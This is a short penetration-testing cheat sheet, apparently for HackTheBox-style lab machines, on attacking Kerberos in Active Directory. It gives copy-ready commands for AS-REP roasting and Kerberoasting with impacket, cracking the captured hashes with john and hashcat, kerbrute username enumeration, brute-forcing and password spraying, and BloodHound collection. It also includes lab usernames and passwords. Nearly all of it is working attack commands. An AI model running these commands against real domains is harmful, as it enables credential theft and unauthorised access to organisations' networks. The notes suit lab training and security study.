88 KERBEROS

AS-REP Roasting

Null Credentials

impacket-GetNPUsers htb.local/ -dc-ip $ip -request

With Username

• with username

impacket-GetNPUsers -no-pass -dc-ip $ip intelligence.htb/Jose.Williams

• #command-2

python /usr/share/doc/python3-impacket/examples/GetNPUsers.py blackfield.local/ -no-pass -usersfile users.txt -dc-ip $ip | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'

• with user-file (make sure to use command in the same format shown below:)

impacket-GetNPUsers cascade.local/ -no-pass -dc-ip $ip -usersfile uname.txt

1. Crack the hash

john hash-file.txt --format=krb5asrep

hashcat hash-file.txt -m 18200 /usr/share/wordlists/rockyou.txt --force

Kerberoasting

if we have password

GetUserSPNs.py -request -dc-ip $ip 'blackfield.local/support:#00^BlackKnight'

Kerbrute

1. check username validation

kerbrute userenum --dc $ip -d intelligence.htb usernames.txt

1. Brute Username ( 1 username - 99 password)

kerbrute bruteuser --dc $ip -d intelligence.htb passwords.txt uname

1. Password-Spray ( 99 username - 1 password)

kerbrute passwordspray --dc $ip -d intelligence.htb usersnams.txt Pass@1234

1. Brute-force uname:pass , (file containing username:password in this format)

cat file | kerbrute bruteforce    

Bloodhound Enumeration

Sharphound

On shell

.\sharphoun.exe

Import-module sharphound.ps1
.\sharphound.ps1

Bloodhound.py

Enumerate using credentials

bloodpound -u Tracy.White -p zqwj041FGX -ns $ip -d nara-security.com -c all

Link

https://notes.benheater.com/books/active-directory/page/remote-bloodhound

---